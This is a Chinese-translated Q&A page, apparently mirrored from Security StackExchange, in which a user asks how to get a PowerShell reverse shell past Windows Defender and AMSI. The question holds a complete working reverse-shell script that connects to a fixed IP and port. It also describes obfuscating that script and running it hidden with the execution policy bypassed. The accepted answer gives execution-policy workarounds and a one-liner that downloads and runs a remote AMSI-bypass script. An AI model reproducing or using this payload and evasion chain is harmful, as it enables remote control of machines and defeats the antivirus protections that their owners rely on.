文章/答案/技术大牛

发布

社区首页 >问答首页 >绕过AMSI Windows 10

问绕过AMSI Windows 10
EN

Security用户

提问于 2020-05-11 23:41:50

回答 1查看 2.3K关注 0票数 2

我试着在windows 10上运行一个powershell反向外壳。无论如何，每次它被Wndow防御程序阻塞时。我怎么能绕过它？

在一个文件中我存储有效载荷

$client = New-Object System.Net.Sockets.TCPClient('192.168.1.54',9999);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{;
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close();

然后我使用xencrypt混淆代码，但是当我运行powershell -NoP -NonI -W Hidden -Exec Bypass .\revshell.ps1时

我得到了

Questo script include contenuto dannoso ed è stato bloccato dal software antivirus.
In riga:18 car:1
+ IEX($piifnga)
+ ~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

问题：有办法绕过这个检查吗？

windows

antivirus

reverse-shell

回答 1

Security用户

回答已采纳

发布于 2020-06-19 09:51:54

打开powershell
使用Get-ExecutionPolicy -List列出执行策略
如果LocalMachine是Restricted而你不是管理员..。
...you可以使用Set-ExecutionPolicy -Scope Process Unrestricted在本地更改策略，这允许您执行存储在机器上的.ps脚本.
...anyway仍然不能运行恶意内容。所以绕开AMSI

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/aloksaurabh/OffenPowerSh/master/Bypass/Invoke-AlokS-AvBypass.ps1'); Invoke-AlokS-AvBypass

现在，无论您执行ScriptContainedMaliciousContent消息的脚本是什么，它都不再显示

票数 0

页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持

原文链接：

https://security.stackexchange.com/questions/231508

复制

相似问题

问绕过AMSI Windows 10
EN

回答 1

Security用户

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐

问绕过AMSI Windows 10EN

回答 1

Security用户

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐

问绕过AMSI Windows 10
EN